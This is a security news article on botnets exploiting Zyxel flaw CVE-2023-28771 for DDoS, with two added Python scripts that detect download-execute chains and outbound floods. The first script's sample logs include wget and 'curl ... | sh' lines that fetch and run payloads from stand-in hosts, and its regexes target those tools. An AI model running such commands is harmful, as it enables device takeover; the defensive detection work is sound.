Thursday, February 22, 2024

Critical Zyxel Firewall Injection Flaw Exploited to Conduct DDoS Attacks

Increased botnet activity targeting a vulnerability (CVE-2023-28771) in Zyxel devices has become a major concern for its users.

This vulnerability lets an unauthenticated attacker execute arbitrary code by sending a specially crafted packet to the targeted device.

Since CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, attacks have surged; the flaw carries a severity rating of 9.8.

According to FortiGuard researchers, multiple botnets, including Dark.IoT (a Mirai-based variant) and a botnet that can perform customizable DDoS attacks, were involved in targeting the vulnerability.

Botnet activity

Analysis of Attack:

The traffic has been observed across multiple regions, such as Central America, North America, and East and South Asia.

Threat actors specifically target the command injection vulnerability in Internet Key Exchange (IKE) packets transmitted over UDP to Zyxel devices.

They then use curl or wget to download scripts tailored to the MIPS architecture for further malicious actions.

The initially downloaded scripts rename themselves and execute with zywall parameters to verify connectivity to the vulnerable Zyxel device.

Additional scripts associated with the RapperBot malware were downloaded from a different server, which in turn downloads MIPS script files to establish persistence.

This shows that the threat actors used multiple servers in this campaign to compromise Zyxel devices.
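The download, rename, chmod and execute sequence described above is a post-exploitation chain that a defender can hunt for in device or host process logs, independently of how the initial IKE packet looked. The following is an added example, not code from the article or from FortiGuard: it correlates generic syslog-style process-execution lines (constructed here for the example, not real Zyxel logs) per host and raises an alert when a download from a remote URL is followed by execution from a temporary directory within a time window.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in a generic syslog "exec:" shape (not real Zyxel
# output); IPs are documentation ranges, paths are hypothetical.
SAMPLE_LOGS = [
    "Feb 22 10:01:02 fw1 sh[1201]: exec: ps -ef",
    "Feb 22 10:01:05 fw1 sh[1203]: exec: wget http://203.0.113.7/mips -O /tmp/.x",
    "Feb 22 10:01:06 fw1 sh[1204]: exec: mv /tmp/.x /tmp/.y",
    "Feb 22 10:01:06 fw1 sh[1205]: exec: chmod 777 /tmp/.y",
    "Feb 22 10:01:07 fw1 sh[1206]: exec: /tmp/.y",
    "Feb 22 10:05:00 fw1 sh[1300]: exec: curl -fsSL http://198.51.100.9/r.sh | sh",
]

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) \S+: exec: (?P<cmd>.*)$"
)

# Each stage of the chain is matched by a pattern over the executed command.
STAGES = [
    ("download", re.compile(r"\b(wget|curl|tftp)\b.*(https?|ftp)://")),
    ("stage", re.compile(r"\b(mv|cp)\b .*(/tmp|/var|/dev/shm)/")),
    ("chmod", re.compile(r"\bchmod\b.*\b(\+x|7\d\d)\b")),
    ("exec", re.compile(r"^(?:sh |bash |)?/(tmp|var|dev/shm)/\S+")),
]


def parse_line(line):
    """Return (timestamp, host, command) or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog lines carry no year
    return ts, m["host"], m["cmd"]


def classify(cmd):
    """List the chain stages a command matches (usually zero or one)."""
    return [name for name, rx in STAGES if rx.search(cmd)]


def find_download_execute_chains(lines, window_seconds=300):
    """Alert per host when a 'download' event is followed by an 'exec' event
    within window_seconds. Returns a list of (host, stages, commands)."""
    state = {}  # host -> recent (ts, stage, cmd) events inside the window
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        ts, host, cmd = parsed
        for stage in classify(cmd):
            events = state.setdefault(host, [])
            # Expire events that fell out of the correlation window.
            events[:] = [e for e in events if ts - e[0] <= timedelta(seconds=window_seconds)]
            events.append((ts, stage, cmd))
            if stage == "exec" and any(e[1] == "download" for e in events):
                alerts.append((host, [e[1] for e in events], [e[2] for e in events]))
                state[host] = []  # reset so the same chain is not reported twice
    return alerts


if __name__ == "__main__":
    for host, stages, cmds in find_download_execute_chains(SAMPLE_LOGS):
        print(f"ALERT {host}: {' -> '.join(stages)}")
        for c in cmds:
            print("   ", c)
```

The correlation window matters: the chain in the sample completes in two seconds, but a bot that sleeps between stages would slip past a very short window, while a long window on a busy host will eventually pair unrelated downloads and executions. Tune it per environment, and treat the "curl ... | sh" line (a download with no on-disk execution) as a separate rule if you want it surfaced.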

Threat actors update their tactics and techniques frequently, within short time frames, to maximize the number of compromised devices.

As noted earlier, one of the botnets employed by the threat actor is Dark.IoT, which uses an OpenNIC server for DNS resolution and communication with its C2 server.

Devices with known vulnerabilities should be patched and updated as soon as possible to prevent attacks and compromises.

Once the victim system receives the attack command, it starts a DDoS attack on a specific IP address and port number. One example of this DDoS attack traffic is shown below.
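A compromised device that has received an attack command produces a burst of outbound packets from one source to one destination IP and port, which is the signature a network operator can look for in flow records from the device's uplink. The following is an added example, not code from the article or from FortiGuard: it runs a sliding-window packet-rate check over constructed flow records (timestamps in milliseconds, documentation-range IPs) and flags any source/destination/port tuple whose peak rate exceeds a threshold.

```python
from collections import defaultdict

# Constructed flow records: (timestamp_ms, src_ip, dst_ip, dst_port, proto).
# One infected host floods a single target; two benign conversations are mixed in.
SAMPLE_FLOWS = (
    [(1_000_000 + i * 10, "192.0.2.10", "198.51.100.50", 80, "udp") for i in range(500)]
    + [(1_000_000 + i * 1000, "192.0.2.10", "203.0.113.20", 443, "tcp") for i in range(5)]
    + [(1_000_000 + i * 500, "192.0.2.11", "198.51.100.50", 53, "udp") for i in range(20)]
)


def peak_packets_in_window(times_ms, window_ms):
    """Largest number of packets that fall inside any window of window_ms.
    Two-pointer sweep over sorted timestamps, O(n)."""
    times = sorted(times_ms)
    start = 0
    peak = 0
    for end, t in enumerate(times):
        while t - times[start] > window_ms:
            start += 1
        peak = max(peak, end - start + 1)
    return peak


def detect_outbound_floods(flows, window_ms=1000, threshold=100):
    """Return one alert dict per (src, dst, dport, proto) whose peak packet
    count within window_ms reaches threshold."""
    by_key = defaultdict(list)
    for ts, src, dst, dport, proto in flows:
        by_key[(src, dst, dport, proto)].append(ts)
    alerts = []
    for (src, dst, dport, proto), times in by_key.items():
        peak = peak_packets_in_window(times, window_ms)
        if peak >= threshold:
            alerts.append(
                {"src": src, "dst": dst, "dport": dport, "proto": proto, "peak_per_window": peak}
            )
    # Loudest flow first so the likely victim is at the top of the list.
    return sorted(alerts, key=lambda a: a["peak_per_window"], reverse=True)


if __name__ == "__main__":
    for a in detect_outbound_floods(SAMPLE_FLOWS):
        print(f"FLOOD {a['src']} -> {a['dst']}:{a['dport']}/{a['proto']} "
              f"peak {a['peak_per_window']} pkts/s")
```

The threshold is deliberately low here because the sample is small; on a real uplink it should be set from a baseline of normal per-destination rates, and the same check can be run on byte counts instead of packet counts to catch amplification-style floods with few large packets.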


